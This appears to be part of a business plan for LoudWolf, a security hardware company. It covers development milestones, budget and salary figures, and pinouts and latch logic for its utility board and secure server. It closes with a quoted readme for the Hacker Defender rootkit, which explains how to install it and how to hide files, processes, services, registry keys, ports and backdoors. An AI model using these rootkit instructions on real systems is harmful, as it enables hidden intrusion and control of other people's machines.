• Presentation and ratification / product definitions / final budgets and detailed production timelines
• Software production commences
• Data analysis continues
• Sensor development commences, with development of a sensor test and evaluation ‘mule’ (see figure below of the prototype for the sensor ‘mule’ development system).
Month 3:
• Deliver marketing analysis
• Licensing vs. direct sales analysis
• Localization issues analysis
• Demonstrate initial five to six sensor packages
• Demonstrate sensor package development software beta
Month 4:
• Status analysis leading to outsourced bid for hardware
• Final software definition
• Detailed software budget and milestone delivery schedule
• Software team ramp up complete
• Hardware development team establishes liaison procedures with software teams
• Software teams split into three groups for modular self-configuration development
Month 5:
• Software module testing procedures in place; accumulate first one third of software modules
• Software team splits off consumer products group
• Delivery of second group of five to six sensor modules
• Initial demonstration of prototype development mule
(Figure: Prototype Sensor Development System)
Month 6:
• Software integration complete
• Reliability testing and sensor evaluation commences
• Software team re-splits into red team, blue team for attack defense simulation
• Bi-weekly review process implemented
• Quality assurance database established
• Delivery of third batch of five to six sensor packages
• Demonstration of beta development platform to in-house team and key beta site customers
Month 7:
• Consumer Sentinel design complete
• Red team blue team testing continues
• Quality assurance database monitored for predictable progress
• Final schedule and budget review
• Launch date established
• Customer list delivered by marketing
• Marketing commences hiring and training sales team
• Delivery of final package of sensors
• Sensor integration and combinatorial analysis commences
• Software team reconfigures into sensor package groups
Month 8:
• Sentinel prototype complete, software integration begins
• Delivery of prototype sales and marketing demonstration sheet
• Documentation of training and operation manuals
• Documentation of deployment procedures and evaluation of incident-response procedures
• Independent review of final product specifications, marketing budgets and infrastructure plans.
Month 9:
• STEEL hardware released to manufacturing
• Hardware team reconfigured for industrial version development
• Software team reconfigures for Sentinel Avenger product
• Military support team and industrial development team
• Marketing team now fully staffed, enters training
• Delivery of initial marketing demonstration machines
• Hardware and software teams each assigned training experts to marketing
• Marketing delivers demonstration road-show, itinerary and budget
Month 10:
• Beta site deployed with representatives from hardware, software and marketing teams
• Software team reassigned to industrial and consumer (Sentinel)
• Hardware team reassigned to industrial and additional products (Sentinel Sharp)
Month 11:
• Beta site review
• Change implementation
• Beta site update and validation
• Industrial product definition and scheduled delivery
• Sentinel Sharp design complete
Month 12:
• Production unit testing and evaluation
• Change and review
• Update beta sites to production teams
• Demonstration of industrial software (beta)
• Sentinel (Consumer product) released to manufacturing
• Demonstration of industrial development mule
End of First Year Summary of Achievements
By this time we hope to have reached the following broad goals:
• LoudWolf has received contracts (subject to testing) for several test systems from various military units.
• LoudWolf has garnered letters of intent and / or contracts from several large industry specialist companies for collaboration and the development of industries dependent on Ultra Secure IP protection (such as the movie industry).
• LoudWolf has income from its consumer products and licensing divisions.
• LoudWolf can predict its income based upon initial consumer response for Sentinel products and its military contracts.
Second Year
Month 13:
• Certification of beta military sites
• Conversion to live customers
• Release production units to sales
• Assign one third software and one third hardware teams to sales support and pre sales
• Sentinel software development continues
Month 14:
• Delivery of industrial version beta
• Finalize schedule and budgets for industrial market
• Red team blue team conversion for industrial software
• Hardware team assigned to IC
• Sentinel software development continues
Month 15:
• Software team reconfigured to sensor groupings
• Hardware team split between industrial and consumer
• Marketing task force commences consumer analysis
Month 16:
• Sentinel Software complete
• Software team switches to Avenger product
• Hardware team finalizes Sentinel Sharp product for military use
End of Second Year Summary of Achievements
By the end of the second year, we would hope to have achieved the following broad goals:
• LoudWolf has completed the development of the majority of its anticipated products. The majority of income is derived from product sales and royalties from licensed technologies.
• The first stage of worldwide deployment is complete and LoudWolf turns its marketing efforts on “secondary market” countries, devoting much of its previously large R&D budget into localization technology and local marketing efforts.
• LoudWolf devolves its military technologies to the industrial and commercial sectors, decreasing the difference between its military grade and industrial grade offerings, following the philosophy of universal high-grade protection.
End of Third Year Summary of Achievements
By this time we expect to have achieved the following broad goals:
• LoudWolf technologies are now fully deployed and have leadership positions in a number of market sectors.
• LoudWolf technologies are well established as the enabling technologies behind several major industries. These industries are beginning to mature and transition from product development to deployment.
• LoudWolf Holdings Ltd. is now a well-diversified company with a finely-tuned management structure based in London. The company seeks, in the coming years, to fine tune its marketing strengths and eliminate its weaker sub-units in anticipation of competitive forces from other companies.
• LoudWolf continues to expand revenues from services connected with its products as opposed to the previous emphasis on development and sales of product.
• LoudWolf continues to transition away from research and development and focuses the majority of its resources into its worldwide market development effort.
• LoudWolf deploys products and technologies into its last remaining secondary markets, reaching the point of diminishing returns on product localization profits.
Budget Assumptions
In general, we can safely assume that 80 to 90 percent of all expenses will be salary. This is typically the case in the R&D phase of any business, especially a technology-based business such as this. The only two exceptions worthy of consideration at this stage are the “big ticket” hardware items, these being short-period or one-time budgetary allotments. They are:
1. Initial tooling of hardware and software labs, deposits on premises, fixtures, fitments, equipment, software development tools and prototype production engineering hardware.
2. Payment for production units to our outsourced Far-East factory.
All other expenses, with the possible exception of rent and insurance, are dealt with in a fifteen percent overhead figure. This is not to be confused with the twenty one percent “burden” which is ordinarily added to the gross salaries of all employees, covering the employer’s contribution of state and federal taxes, employer’s liability insurance, and employee benefit packages. In my experience we can expect these assumptions, plus a very good head count estimate, to produce a budget that will echo reality, if a little conservatively, to within a very small percentage. (Typically in the order of three to five percent.)
Salary is determined by recent experience, past histories and current industry expert estimates. All employees are salary-classified “exempt” for tax purposes (exempt in the US means exempt from overtime and double-time laws) except for admin and QA.
Outsourced labor will consist of legal and professional services and may on occasion be supplemented by expert commissions. These are budgeted “ad hoc” on a best guess basis. In the event that larger funding becomes available, this budget and schedule would be unaffected. However, the scope of projects applying our core technologies to other market needs would result in a funding demand that could easily benefit from between two and four times the current funding.
Average Salary Per Category of Job
Gross Salary Expressed in Thousands of US Dollars Per Annum

Category                        Salary range
Programmers                     60-95
Senior programmers              80-135
Lead programmers                135-160
Quality assurance engineers     50-60
Hardware engineers              70-150
Senior hardware engineers       150-200
Craftsmen                       50-120
Marketing Sr. VP                120-200
Marketing Director              70-120
Research                        70-120
Administration                  50-80
Accounting                      120-150
Sales Regional                  120-250
Management President COO        80-250
Sales Area                      140-180
Sales District & Industry       80-120
Management CEO                  250-550
Headcount Over Time
The staffing for this suite of projects initially starts small: one hardware engineer and one software engineer. Thereafter, growth is fed by a ‘recruiting pipeline,’ which is capable of delivering a constant linear increase of about one head per month. By month 10 we are at 12 engineering heads, at which point we add an admin and a project manager. At month 12, leveling off at month 13, we plan to have 15 heads in engineering. Marketing starts at two, adding 5 sales staff beginning at month 7 with an independent recruiting effort, therefore topping out at 18-19 strong at the 18-month mark.
REFERENCE SECTION TECHNICAL NOTES:
LOUDWOLF - RIXA STEEL UTILITY BOARD DOCUMENTATION V1.0
DESCRIPTION.
Utility functions such as instrumentation and sensor control are performed by the utility board and several specialized satellite boards. The utility board can be used “stand alone” as a sixteen channel programmable controller, or with the addition of remote satellite boards may be enhanced to 64 channels in its basic form. Additional expansion capability is available up to 1024 channels. Each satellite board requires only one chip, a 74ALS373, to add an additional eight channels to the controller system. Both the main utility board and its satellites are entirely self-contained and operate independently of the host computer; additionally, utility programs are stored in non-volatile memory and feature a power-on reset capability. The utility board communicates to and from the host via an RS232 communications protocol. Quite a large number of these boards are used in the RIXA family of products and therefore they are designed to be both extremely flexible and economical.
The board features a powerful micro-controller with its own microprocessor, a limited amount of Random Access Memory (RAM) and a non-volatile EEPROM memory for programming at the factory. Combined with a few additional chips this forms the basis of many of the housekeeping and sensor management tasks for the Rixa family of products.
The following documentation is intended to serve as a design template for the Rixa engineers tasked with the development of the various sub systems. The utility board is NOT to be used for systems requiring time critical operation or direct connection to the host PC; for those applications we will be utilizing the much more powerful Rabbit 3000 processor, which is capable of direct interfacing to the PCI bus. The utility board is ideal for instrumentation applications, sensor control and watchdog functions. The utility board features are as follows:
• On board 8 channel latched LED array
• Buffered & latched 8 bit data bus
• Up to 4 independent serial communications ports
• Three additional expansion channels
• Three independent analog to digital converters
• Power on and manual reset
• 38 bytes scratch RAM
• Dedicated RS232 serial port
Micro-controller specifications
The default micro-controller used in the utility board is the Parallax BS2P, which strikes a nice
three-way balance between speed of execution, (20 Mega-Hertz), EEPROM programming memory
capacity and economy. For specific applications the utility board can be populated with other more
(Or less) powerful micro-controller chips.
CONNECTION SPECIFICATIONS: CN1 (15 pin in line connector on 0.1 inch centers)
When adapted to a DB15 connector the same pin numbers are used.
Pin one is located at the center of the board.

PIN#  DESCRIPTION
 1    Slave board select (0)
 2    Slave board select (1)
 3    Slave board select (2)
 4    Slave board select (3)
 5    Ground
 6    Vcc = 5 Volts
 7    Slave board select (4)
 8    Slave board select (5)
 9    Slave board select (6)
10    Slave board select (7)
11    Expansion channel (P5)
12    Expansion channel (P6)
13    Expansion channel (P7)
14    Vcc = 5 Volts
15    Ground
PROCESSOR SCHEMATIC DIAGRAM
PRINTED CIRCUIT BOARD DESIGN (MASTER UTILITY BOARD)
(Figure: Typical satellite board, design reference schematic V1.0)
Software functionality:
The basic software is generic in nature, acting as middleware between the host CPU and various hardware components. The software initializes attached peripherals and then polls the RS232 host computer interface. The host CPU can instruct the Utility Board to turn on or off any combination of output bits. Specialized versions of the software, using the same Utility Board hardware, enhance this functionality with the addition of analog and digital sensors, which the Utility Board processor can respond to without the intervention of the host CPU. A software library has been developed to provide consistent low-level functions for all variants of the board's application software, which reduces the development time for a subsystem (to less than a day in most cases). The consistent low-level software library also gives us the ability to construct ultra-reliable complex systems consisting of modular, self-contained subsystems.
Printed circuit board for the satellite circuit: ten-pin connectors allow for a pass-through of the 8-bit data bus and the 8-channel board select lines. The 20-pin jumper block allows the address of the board to be set. Besides the jumpers selecting boards 1-8 there are two additional positions, designated disable and bus monitor mode. The board illustrated is a LED monitor board; other variants include mechanical or solid-state relay, CPU driver, etc.
SOFTWARE DEVELOPMENT CONSIDERATIONS: (Design reference – only)
Initialization
The system should take care to perform an initialization on reset or power up. The system will reset when:
• The reset button is pressed.
• The power is withdrawn and re-connected.
• The system detects a drop in Vcc from a nominal 6 Volts to 4 Volts or less.
General initialization sequence:
Goal: set all outputs to fail-safe defaults upon initialization. All outputs are high on power on; even so, the initialization procedure sets all bits to known values.
Pin 3 (Latch Enable 259): High = Hold
Pin 4 (Data Latch Enable 373): High = No satellite latch
Address pins: pin 0 = weighted value 1, pin 1 = weighted value 2, pin 2 = weighted value 4
1. For each address of the satellite boards attached, set pins 0-2 (e.g. board 6 = pins 1 and 2: 2 + 4 = 6).
2. Send LE-259 (Pin 3) low for 10 milliseconds. The data bit is now latched and the address lines are stable.
3. Place the desired default data on the 8-bit bus. Set the data bit (Pin 4) low.
4. Set LE (Pin 3) low to lock the satellite data in; set the data bit (Pin 4) low to fix the lock.
5. Set LE (Pin 3) high, then low, then high.
6. Repeat for all satellite boards connected.
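The following Python simulation is an added example, not LoudWolf code: it models the 74LS259 addressable latch on the main board (P0-P2 address, P3 latch enable, P4 data) and a 74ALS373 transparent latch on each satellite board, runs the initialization sequence above for several boards, and then confirms that later bus and address activity cannot disturb the latched fail-safe values. The ordering of the Pin 4 high and low steps (high to open the addressed board's 373, data on the bus, low to lock it), the power-on output value of 0xFF, the board addresses and the default values programmed are assumptions drawn from the description above, not measurements from hardware.

```python
"""Simulation of the utility-board satellite latching sequence.

Added example; not LoudWolf code. Chip behaviour follows the 74LS259
(addressable latch) and 74ALS373 (transparent latch) named on the page.
Pin ordering of the init sequence and all register values are assumptions.
"""


class Latch259:
    """74LS259: while LE (active low) is low, output Q[A] follows D; otherwise all hold."""

    def __init__(self):
        self.q = [0] * 8

    def update(self, addr, d, le_n):
        if le_n == 0:
            self.q[addr] = d


class Latch373:
    """74ALS373: outputs follow the bus while LE is high; hold when LE is low."""

    def __init__(self, power_on=0xFF):
        self.q = power_on  # page: all outputs high at power on (0xFF assumed)

    def update(self, le, bus):
        if le:
            self.q = bus & 0xFF


def address_pins(board):
    """Weighted address bits on P0, P1, P2 (1, 2, 4). Board 6 -> P1 and P2 set."""
    if not 0 <= board <= 7:
        raise ValueError("satellite address must be 0..7")
    return tuple((board >> i) & 1 for i in range(3))


class UtilityBoard:
    """Main board: P0-P2 address, P3 LE-259 (active low), P4 data line, 8-bit bus."""

    def __init__(self, n_boards=8):
        self.addr = 0
        self.p3 = 1          # LE-259 high = hold
        self.p4 = 1          # data high = no satellite latch
        self.bus = 0xFF
        self.latch259 = Latch259()
        self.boards = [Latch373() for _ in range(n_boards)]
        self._propagate()

    def _propagate(self):
        """Combinational wiring: each 259 output drives one satellite's 373 LE."""
        self.latch259.update(self.addr, self.p4, self.p3)
        for i, board in enumerate(self.boards):
            board.update(self.latch259.q[i], self.bus)

    def set_address(self, board):
        p0, p1, p2 = address_pins(board)
        self.addr = p0 | (p1 << 1) | (p2 << 2)
        self._propagate()

    def set_data_bit(self, d):
        self.p4 = d
        self._propagate()

    def set_bus(self, value):
        self.bus = value & 0xFF
        self._propagate()

    def pulse_le259(self):
        """LE-259 low (10 ms on the real board), then high again."""
        self.p3 = 0
        self._propagate()
        self.p3 = 1
        self._propagate()

    def program_satellite(self, board, value):
        """Assumed reading of the page's sequence: open, load, lock."""
        self.set_address(board)
        self.set_data_bit(1)     # route a high to the addressed board: 373 transparent
        self.pulse_le259()
        self.set_bus(value)      # desired default data now appears on that board
        self.set_data_bit(0)     # route a low: 373 latches on the falling edge
        self.pulse_le259()

    def initialize(self, defaults):
        """Drive every listed satellite to a known fail-safe value."""
        for board, value in defaults.items():
            self.program_satellite(board, value)
        return self.outputs()

    def outputs(self):
        return [board.q for board in self.boards]


def demo():
    """Program three boards (constructed defaults), then disturb the bus and
    the address lines without an LE pulse; latched outputs must not move."""
    ub = UtilityBoard()
    after_init = ub.initialize({0: 0x00, 6: 0xA5, 7: 0x0F})
    ub.set_bus(0x3C)      # host traffic on the shared data bus after init
    ub.set_address(6)     # address change with LE-259 held high
    return after_init, ub.outputs()


if __name__ == "__main__":
    before, after = demo()
    print([hex(v) for v in before], [hex(v) for v in after])
```

Boards that the sequence never addresses keep their power-on value, which is why the page insists on visiting every attached satellite during initialization rather than relying on the power-on state.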
CONNECTOR PIN OUTS FOR CN3 (DB9 pin D sub-miniature)

PIN#  Utility board function  PC function
 1    No Connection
 2    SOUT                    Rx
 3    SIN                     Tx
 4    ATN                     DTR (Isolated via 0.1 uF capacitor)
 5    Ground                  Signal Ground
 6    LOOPBACK                DSR
 7    LOOPBACK                RTS
 8    No Connection
 9    No Connection

NOTES:
To simplify the printed circuit board wiring and reduce the overall board size, the on-board outputs are wired in the order 1, 2, 3, 4, 8, 7, 6, 5.
CONNECTIONS: Main bus CN2 (9 pin in line connector, 0.1 inch centers)

PIN#  DESCRIPTION      PIN#  DESCRIPTION
 1    Ground            2    Main bus bit 8
 3    Main bus bit 7    4    Main bus bit 6
 5    Main bus bit 5    6    Main bus bit 4
 7    Main bus bit 3    8    Main bus bit 2
 9    Main bus bit 1
Pin one is located at the edge of the board (Revision 0).

Processor pins and functions

PIN#  PIN NAME  FUNCTION
 1    SOUT      DB9(2) Rx, Serial Send
 2    SIN       DB9(3) Tx, Serial Receive
 3    ATN       DB9(4) DTR, Attention
 4    Vcc       5 Volts DC regulated
 5    P0        Satellite board address bit (0)
 6    P1        Satellite board address bit (1)
 7    P2        Satellite board address bit (3)
 8    P3        Latch enable for board address (Active low)
 9    P4        Data line routed to addressed board
10    P5        Expansion bit (0)
11    P6        Expansion bit (1)
12    P7        Expansion bit (2)
13    P8        Data bus bit (0)
14    P9        Data bus bit (2)
15    P10       Data bus bit (3)
16    P11       Data bus bit (4)
17    P12       Data bus bit (5)
18    P13       Data bus bit (6)
19    P14       Data bus bit (7)
20    P15       Data bus bit (8)
21    Ground    Ground
22    Reset     Reset
23    Vcc       5 Volts regulated
24    VIN       6 – 12 Volts DC, alternate unregulated supply voltage
AUXILIARY CONTROL SUBSYSTEM CONTROL PANEL PIN-OUTS, MOLEX 20 PIN CONNECTOR (AS SEEN FROM MALE CONNECTOR ON CONTROL MODULE)
(Connector drawing and wire table: wires 1-19; the connections that survive extraction, in order, are LIGHT 8, LIGHT 4, LIGHT 4, LIGHT 7, LIGHT 6, LIGHT 5, LIGHT 3, PLUS 12 Volts Regulated, Ground, LIGHT 1. The wire-to-connection alignment did not survive.)
Rixa “STEEL” SECURE SERVER Design Reference only
The following information is specific to the Intel 850GB mother board. Consult the master connection diagrams for specific motherboard connect points.
HARDWARE DOCUMENTATION MAIN BOARD SENSOR CONNECTOR #1
(Pins are listed in the order of the original table, 1, 21, 2, 22, and so on.)

PIN  FUNCTION                LOCATION  WIRE
 1   LED RJ45 Green pin x    H1        Yell
21   LED RJ45 Green pin x    H1        Whi
 2   LED RJ45 Yellow pin x   H1        Yell
22   LED RJ45 Yellow pin x   H1        Whi
 3   REAR INTRUDER pin 2     E1        Yell
23   REAR INTRUDER pin 1     E1        Whi
 4   LED DIAGNOSTIC pin 8    H1        Yell
24   LED DIAGNOSTIC pin 7    H1        Whi
 5   LED DIAGNOSTIC pin 6    H1        Yell
25   LED DIAGNOSTIC pin 5    H1        Whi
 6   LED DIAGNOSTIC pin 4    H1        Yell
26   LED DIAGNOSTIC pin 3    H1        Whi
 7   LED DIAGNOSTIC pin 2    H1        Yell
27   LED DIAGNOSTIC pin 1    H1        Whi
 8   PARALLEL                J-K1      Whi
28   PARALLEL                J-K1      Whi
 9   PARALLEL                J-K1      Whi
29   PARALLEL                J-K1      Whi
10   PARALLEL                J-K1      Whi
30   PARALLEL                J-K1      Whi
11   PARALLEL                J-K1      Whi
31   PARALLEL                J-K1      Whi
12   PARALLEL                J-K1      Whi
32   PARALLEL                J-K1      Whi
13   PARALLEL                J-K1      Whi
33   PARALLEL                J-K1      Whi
14   PARALLEL                J-K1      Whi
34   PARALLEL                J-K1      Whi
15   PARALLEL                J-K1      Whi
35   PARALLEL                J-K1      Whi
16   PARALLEL                J-K1      Whi
36   PARALLEL                J-K1      Whi
17   PARALLEL                J-K1      Whi
37   PARALLEL                J-K1      Whi
18   PARALLEL                J-K1      Whi
38   PARALLEL                J-K1      Whi
19   PARALLEL                J-K1      Whi
39   PARALLEL                J-K1      Whi
20   PARALLEL                J-K1      Whi
40   NO CONNECTION
CONNECT column (244 U1 pin numbers; row alignment did not survive extraction): 1, 4, 5, 6, 24, 7, 8, 22, 9, 10, 20, 11, 12, 18, 13, 17, 14, 16
Rixa “STEEL” SECURE SERVER
HARDWARE DOCUMENTATION MAIN BOARD SENSOR CONNECTOR #2
(Pins are listed in the order of the original table, 1, 21, 2, 22, and so on.)

PIN  FUNCTION            LOCATION   WIRE
 1   LED STANDBY POWER   6F         Red
21   LED STANDBY POWER   6F         Blue
 2   BIOS CONFIG pin3    8C         Yell
22   BIOS CONFIG pin2    8C         Blue
 3   BIOS CONFIG pin1    8C         White
23   WOR pin1            C1         White
 4   WOR pin2            C1         Blue
24   PWR/SLP pin3        C3         Blue
 5   PWR/SLP pin1        C3         Yellow
25   SMB pin1            C8         Blue
 6   SMB pin2            C8         Yellow
26   SMB pin3            C8         White
 7   CONFIG BIOS         C8 (J8C2)  Yellow
27   CONFIG BIOS         C8 (J8C2)  Red
 8   CONFIG BIOS         C8 (J8C2)  White
28   PC/PCI pin1         6D         Red
 9   PC/PCI pin5         6D         White
29   PC/PCI pin6         6D         Gray
10   PC/PCI pin4         6D         Blue
30   PC/PCI pin2         6D         Green
11   FNT-USB pin3        C10        Red
31   FNT-USB pin1        C10        White
12   FNT-USB pin7        C10        Yellow
32   FNT-USB pin5        C10        Blue
13   FNT-USB pin8        C10        Green
33   FNT-USB pin9        C10        White
14   FNT-USB pin4        C10        Blue
34   FNT-USB pin6        C10        Purple
15   USB/CNB pin1        D8 (J8D1)  White
35   FNT-USB pin2        C10        Gray
16   USB/CNB pin3        D8 (J8D1)  Green
36   USB/CNB pin2        D8 (J8D1)  Red
17   USB/CNB pin5        D8 (J8D1)  Blue
37   USB/CNB pin6        D8 (J8D1)  Purple
18   CLR/CM pin3         D9 (J8D2)  Yellow
38   USB/CNB pin4        D8 (J8D1)  Yellow
19   CLR/CM pin2         D9 (J8D2)  Red
39   CLR/CM pin1         D9 (J8D2)  White
20   BATTERY- NEGATIVE   A9         White
40   BATTERY +POSITIVE   A9         Red
CONNECT column (row alignment did not survive extraction): 6
DB 25 CONNECTOR
Parallel PIN-OUTS
AS SEEN FROM FEMALE CONNECTOR AT REAR OF CPU
(Connector drawing: pins 1 to 13 on the upper row, 14 to 25 on the lower row.)

PIN#  NAME          IN-OUT  DESCRIPTION OF SIGNAL
 1    STROBE#       OUT     ACTIVE LOW INDICATES CHAR IS SENT
 2    D0            OUT     DATA BIT 0
 3    D1            OUT     DATA BIT 1
 4    D2            OUT     DATA BIT 2
 5    D3            OUT     DATA BIT 3
 6    D4            OUT     DATA BIT 4
 7    D5            OUT     DATA BIT 5
 8    D6            OUT     DATA BIT 6
 9    D7            OUT     DATA BIT 7
10    ACK#          IN      ACTIVE LOW RECEIVED LAST CHAR
11    BUSY#         IN      PRINTER CANNOT ACCEPT INPUT
12    OUT-OF-PAPER  IN      OUT OF PAPER
13    SELECT        IN      PRINTER ON LINE & CONNECTED
14    AUTOFEED#     OUT     ACTIVE LOW INSERT LINE FEED+CR
15    ERROR#        IN      ACTIVE LOW ERROR HAS OCCURRED
16    INIT-PRINT#   OUT     RESETS PRINTER
17    SELECT-IN#    OUT     TELLS PRINTER IT IS SELECTED
18    GND
19    GND
20    GND
21    GND
22    GND
23    GND
24    GND
25    GND
DRIVE SELECTOR SWITCH WIRING DIAGRAM, 3 Position, 4 Pole, non-shorting, rotary.

POLE NUMBER  COMMON         POS I  POS II  POS III
1            CHANNEL ONE    POS    NEG     NEG
2            CHANNEL TWO    NEG    POS     NEG
3            CHANNEL THREE  NEG    NEG     POS
4            POS            LED1   LED2    LED3

The tri-state IDE buffers are enabled/disabled by the common lines of the first three channels, which act as a data selector selecting either plus five or ground, providing a one-of-three positive data selector (active high), with the other two lines tied low. The fourth pole is used to route an active high, three-channel data distributor to the three bi-colored LEDs on the front panel.

Switch wire colors (four per pole, in the order extracted):
1  orange, yellow, gray, dark blue
2  red, white, white, lt.blue
3  white, red, white, green
4  white, white, red, purple
TRI-STATE BUFFER UTILIZATION (U1)
“U1” DM-54LS244 NON INVERTING OCTAL TRISTATE BUFFER, MILITARY (MILSPEC)

PIN#  DESCRIPTION
 1    GROUND: OUTPUT ENABLE CHANNEL 0-3
 2    0 IN
 3    4 OUT
 4    1 IN
 5    5 OUT
 6    2 IN
 7    6 OUT
 8    3 IN
 9    7 OUT
10    GROUND
11    7 IN
12    3 OUT
13    6 IN
14    2 OUT
15    5 IN
16    1 OUT
17    4 IN
18    0 OUT
19    GROUND: OUTPUT ENABLE CHANNEL 4-7
20    VCC

STROBE LIGHT CABLE DEFINITION, 4 PIN MOLEX CONNECTOR, AS SEEN FROM REAR OF UNIT
1  RED WIRE, PLUS 5 VOLTS
2  NO CONNECTION
3  *YELLOW WIRE INT, WHITE EXT: SIGNAL, +5 Volts = DISABLE STROBE
4  GROUND: WHITE WIRE INT, BLACK WIRE EXT
*SIGNAL IS TTL COMPATIBLE VIA 1.8K RESISTOR TO BASE OF INTERNAL NPN TRANSISTOR – 2N2222

UPS LED STATUS EXTERNAL READOUT CABLE DEFINITION
DRAIN
1  LED
2  LED
3  LED
4  LED
5  LED
GROUND
FRONT PANEL 40 PIN MULTIPLEX CONTROL & DIAGNOSTIC CABLE
NUMBERED SEQUENTIALLY ACROSS CABLE FROM PIN ONE

CON  INDICATION                    LOCATION  FUNCTION  WIRE COLOR
 1   LED GREEN                     STATUS    ANODE     YELLOW
 2   LED GREEN                     STATUS    CATHODE   YELLOW
 3   LED RED                       CONFLICT  CATHODE   GREEN
 4   LED YELLOW SCROLL                       CATHODE   GRAY
 5   LED YELLOW CAPS-LOCK                    CATHODE   ORANGE
 6   LED YELLOW NUM-LOCK                     CATHODE   GREEN
 7   LED COMMON EXCEPT FOR STATUS            ANODE     RED
 8   SWITCH LEARN                            N/O       BLUE
 9   SWITCH LEARN                            N/O       BLUE
10   GROUND                                  GROUND    WHITE
11   LED RJ45 Green pin x          H1                  Yell
12   LED RJ45 Green pin x          H1                  Whi
13   LED RJ45 Yellow pin x         H1                  Yell
14   LED RJ45 Yellow pin x         H1                  Whi
15   REAR INTRUDER pin 2           E1                  Yell
16   REAR INTRUDER pin 1           E1                  Whi
17   LED DIAGNOSTIC pin 8          H1                  Yell
18   LED DIAGNOSTIC pin 7          H1                  Whi
19   LED DIAGNOSTIC pin 6          H1                  Yell
20   LED DIAGNOSTIC pin 5          H1                  Whi
21   LED DIAGNOSTIC pin 4          H1                  Yell
22   LED DIAGNOSTIC pin 3          H1                  Whi
23   LED DIAGNOSTIC pin 2          H1                  Yell
24   LED DIAGNOSTIC pin 1          H1                  Whi
244 U1 pin numbers for lines 11-24 (row alignment did not survive extraction): 1, 4, 5, 6, 24, 7, 8, 22, 9, 10

WIRELESS REMOTE KEYBOARD AND MOUSE EXTERNAL READOUT DEFINITION, DB15 CONNECTOR, FEMALE, AS SEEN FROM CIRCUIT BOARD EXTERNAL CONNECTOR.
(Connector drawing: pins 8 to 1 on the upper row, 15 to 9 on the lower row.)

CONNECTION  INDICATION                    FUNCTION  WIRE COLOR
 1          LED GREEN STATUS              ANODE     BLACK/WHITE
 2          LED GREEN STATUS              CATHODE   RED/WHITE
 3          LED RED CONFLICT              CATHODE   GREEN/WHITE
 4          LED YELLOW SCROLL             CATHODE   BLUE/WHITE
 5          LED YELLOW CAPS-LOCK          CATHODE   WHITE/BLACK
 6          LED YELLOW NUM-LOCK           CATHODE   RED/BLACK
 7          LED COMMON EXCEPT FOR STATUS  ANODE     ORANGE/BLACK
 8          SWITCH LEARN                  N/O       GREEN/BLACK
 9          SWITCH LEARN                  N/O       BLUE/BLACK
10          DRAIN                                   BLACK
11-15       five ENABLE lines and GROUND            WHITE, RED, ORANGE, GREEN, BLUE (row alignment did not survive extraction)
REFERENCE SECTION TECHNICAL NOTES
Trojan “Read me” Files Reference
The following files are actual Read Me files from Trojan Suite software.
Though full of technical jargon these files tell their own story.
Hacker defender
Authors: Holy_Father
Version: 0.8.4
Birthday: 20.10.2003
Hacker defender (hxdef) is rootkit for Windows NT 4.0, Windows 2000 and Windows XP, it may also work on latest NT based systems. Main code is written in Delphi 6. New functions are written in assembler. Driver code is written in C. Backdoor and redirector clients are coded mostly in Delphi 6.
Program uses adapted LDE32: LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE, special edition for REVERT tool version 1.05.
Program uses Superfast/Supertiny Compression/Encryption library: Superfast/Supertiny Compression/Encryption library, (c) 1998 by Jacky Qwerty/29A.
The main idea of this program is to rewrite a few memory segments in all running processes. Rewriting some basic modules causes
changes in process behaviour. Rewriting must not affect the stability of the system or running processes. The program must be
absolutely hidden from all others. Now the user is able to hide files, processes, system services, system drivers, registry keys and
values, open ports, and cheat with free disk space. The program also masks its changes in memory and hides handles of hidden processes.
The program installs hidden backdoors, registers as a hidden system service and installs a hidden system driver. The technology of the backdoor
allowed the implantation of the redirector.
Till version 1.0.0 hxdef is freeware. It can be spread but not changed and all copies must include all files (including original readme
files). The only exception is when the target person (and computer owner) wouldn't know about the copy. This project will be open source
in version 1.0.0. And of course the authors are not responsible for what you're doing with Hacker defender.
Usage of hxdef is quite simple:
>hxdef084.exe [inifile]
or
>hxdef084.exe [switch]
Default name for inifile is EXENAME.ini where EXENAME is the name of executable of main program without extension. This is used
if you run hxdef without specifying the inifile or if you run it with switch (so default inifile is hxdef084.ini).
These switches are available:
-:installonly   only install service, but not run
-:refresh       use to update settings from inifile
-:noservice     doesn't install services and run normally
-:uninstall     removes hxdef from the memory and kills all running backdoor connections
                (stopping hxdef service does the same now)
Example:
>hxdef084.exe -:refresh
Hxdef with its default inifile is ready to run without any change in inifile. But it's highly recommended to create your own settings. See
Inifile section for more information about inifile.
Switches -:refresh and -:uninstall can be called only from the original exefile. This means you have to know the name and path of the running
hxdef exefile to change settings or to uninstall it.
Inifile must contain nine parts: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup
Run], [Free Space], [Hidden Ports] and [Settings]. In [Hidden Table], [Root Processes], [Hidden Services] and [Hidden RegValues] the
character * can be used as a wildcard at the end of a string.
An asterisk can be used only at the end of a string; everything after the first asterisk is ignored. All spaces before the first and after the last other string
characters are ignored.
Example:
[Hidden Table]
hxdef*
This will hide all files, dirs and processes whose name starts with "hxdef".
Hidden Table is a list of files, directories and processes which should be hidden. All files and directories in this list will disappear from
file managers. Programs in this list will be hidden in tasklist. Make sure main file, inifile, your backdoor file and driver file are
mentioned in this list.
Root Processes is a list of programs which will be immune against infection. You can see hidden files, directories and programs only
with these root programs. So, root processes are for rootkit admins. To be mentioned in Root Processes doesn't mean you're hidden.
It is possible to have root process which is not hidden and vice versa.
Hidden Services is a list of service and driver names which will be hidden in the database of installed services and drivers. The service
name for the main rootkit program is HackerDefender084 by default; the driver name for the main rootkit driver is HackerDefenderDrv084.
Both can be changed in the inifile.
Hidden RegKeys is a list of registry keys which will be hidden. The rootkit has four keys in the registry by default: HackerDefender084,
LEGACY_HACKERDEFENDER084, HackerDefenderDrv084 and LEGACY_HACKERDEFENDERDRV084. If you rename the service name or driver name you should
also change this list.
The first two registry keys, for service and driver, are the same as their names. The next two are LEGACY_NAME. For example, if you change
your service name to BoomThisIsMySvc your registry entry will be LEGACY_BOOMTHISISMYSVC.
Hidden RegValues is a list of registry values which will be hidden.
Startup Run is a list of programs which the rootkit runs after its startup. These programs will have the same rights as the rootkit. The program name is
divided from its arguments with a question mark. Do not use " characters. Programs will terminate after user logon. Use common and well
known methods for starting programs after user logon. You can use the following shortcuts here:
%cmd%    - stands for system shell executable + path (e.g. C:\winnt\system32\cmd.exe)
%cmddir% - stands for system shell executable directory (e.g. C:\winnt\system32\)
%sysdir% - stands for system directory (e.g. C:\winnt\system32\)
